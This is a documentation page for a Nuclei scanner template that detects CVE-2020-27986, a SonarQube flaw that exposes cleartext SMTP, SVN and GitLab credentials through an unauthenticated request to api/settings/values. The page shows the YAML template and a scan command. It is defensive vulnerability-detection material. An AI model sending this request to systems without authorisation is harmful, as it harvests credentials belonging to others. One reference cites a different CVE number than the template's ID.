Skip to content
Nuclei Templates

SonarQube - Authentication Bypass

ID: CVE-2020-27986

Severity: high

Author: pikpikcu

Tags: cve,cve2020,sonarqube,sonarsource

Description

Section titled “Description”

SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,SVN, and GitLab credentials via the api/settings/values URI.

YAML Source

Section titled “YAML Source”
id: CVE-2020-27986


info:
  name: SonarQube - Authentication Bypass
  author: pikpikcu
  severity: high
  description: |
    SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
    SVN, and GitLab credentials via the api/settings/values URI.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to sensitive information.
  remediation: Reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
  reference:
    - https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-27866
    - https://github.com/SexyBeast233/SecBooks
    - https://github.com/SouthWind0/southwind0.github.io
    - https://github.com/Z0fhack/Goby_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-27986
    cwe-id: CWE-306
    epss-score: 0.3688
    epss-percentile: 0.97174
    cpe: cpe:2.3:a:sonarsource:sonarqube:8.4.2.36762:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sonarsource
    product: sonarqube
  tags: cve,cve2020,sonarqube,sonarsource


http:
  - method: GET
    path:
      - "{{BaseURL}}/api/settings/values"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - email.smtp_host.secured
          - email.smtp_password.secured
          - email.smtp_port.secured
          - email.smtp_username.secured
        condition: and


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100847c6f20d5b04df9edbbc09a48c8a1afbad1d55c382d8f7979e1f7708a239920022100c0b48594907675a05a04b315a30fef73c4e6979d8e2bb0ff77278f91c0082bf8:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-27986.yaml"

View on Github